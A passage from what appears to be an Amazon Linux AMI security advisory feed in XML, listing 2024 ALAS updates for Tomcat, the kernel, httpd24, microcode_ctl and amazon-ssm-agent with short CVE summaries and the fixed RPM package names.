Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23672" title="" id="CVE-2024-23672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24549" title="" id="CVE-2024-24549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.99-1.97.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.99" release="1.97.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.99-1.97.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1942</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1942: important priority package update for kernel</title><issued date="2024-06-19 18:46:00" /><updated date="2024-07-31 22:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-27020:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()
CVE-2024-26976:
In the Linux kernel, the following vulnerability has been resolved:
KVM: Always flush async #PF workqueue when vCPU is being destroyed
CVE-2023-30456:
An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4.
CVE-2023-1077:
kernel: Type confusion in pick_next_rt_entity(), which can result in memory corruption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1077" title="" id="CVE-2023-1077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30456" title="" id="CVE-2023-30456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26976" title="" id="CVE-2024-26976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27020" title="" id="CVE-2024-27020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.562.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.348-187.562.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.348-187.562.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1943</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1943: important priority package update for kernel</title><issued date="2024-07-03 21:01:00" /><updated date="2024-07-08 17:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-47110:
In the Linux kernel, the following vulnerability has been resolved:
x86/kvm: Disable kvmclock on all CPUs on shutdown
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47110" title="" id="CVE-2021-47110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.348-187.565.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.348-187.565.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.348" release="187.565.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.348-187.565.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1944</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1944: important priority package update for httpd24</title><issued date="2024-07-17 22:27:00" /><updated date="2024-07-24 17:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-38477:
null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request.
Users are recommended to upgrade to version 2.4.60, which fixes this issue.
CVE-2024-38476:
Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.
Users are recommended to upgrade to version 2.4.60, which fixes this issue.
CVE-2024-38475:
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure.
Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
CVE-2024-38474:
Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows attacker to execute scripts in
directories permitted by the configuration but not directly reachable by any URL or source disclosure of scripts meant to only to be executed as CGI.
Users are recommended to upgrade to version 2.4.60, which fixes this issue.
Some RewriteRules that capture and substitute unsafely will now fail unless rewrite flag "UnsafeAllow3F" is specified.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38474" title="" id="CVE-2024-38474" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38475" title="" id="CVE-2024-38475" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38476" title="" id="CVE-2024-38476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38477" title="" id="CVE-2024-38477" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-tools" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.61" release="1.103.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.61" release="1.103.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.61" release="1.103.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.61-1.103.amzn1.noarch.rpm</filename></package><package name="mod24_md" version="2.4.61" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.61-1.103.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.61" release="1.103.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.61" release="1.103.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.61-1.103.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.61" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.61-1.103.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1945</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1945: important priority package update for kernel</title><issued date="2024-07-31 22:26:00" /><updated date="2025-02-27 23:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-39480:
In the Linux kernel, the following vulnerability has been resolved:
kdb: Fix buffer overflow during tab-complete
CVE-2024-38583:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix use-after-free of timer for log writer thread
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38583" title="" id="CVE-2024-38583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39480" title="" id="CVE-2024-39480" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.349-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.349-188.564.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.349" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.349-188.564.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1946</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1946: important priority package update for microcode_ctl</title><issued date="2024-09-13 01:16:00" /><updated date="2024-09-17 16:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-49141:
Improper isolation in some Intel(R) Processors stream cache mechanism may allow an authenticated user to potentially enable escalation of privilege via local access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49141" title="" id="CVE-2023-49141" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.43.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.43.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.43.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.43.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.43.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1947</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1947: important priority package update for kernel</title><issued date="2024-09-26 00:30:00" /><updated date="2024-10-03 10:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-39494:
In the Linux kernel, the following vulnerability has been resolved:
ima: Fix use-after-free on a dentry's dname.name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39494" title="" id="CVE-2024-39494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.352-190.568.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1948</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1948: medium priority package update for amazon-ssm-agent</title><issued date="2024-09-26 00:30:00" /><updated date="2024-10-03 10:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-24790:
The various Is methods (IsPrivate, IsLoopback, etc) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.
CVE-2023-45288:
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45288" title="" id="CVE-2023-45288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24790" title="" id="CVE-2024-24790" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.3.859.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.3.859.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1949</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1949: important priority package update for httpd24</title><issued date="2024-10-09 16:00:00" /><updated date="2024-10-31 14:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-9490:
Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
1866560: CVE-2020-9490 httpd: Push diary crash on specifically crafted HTTP/2 header
CVE-2020-11993:
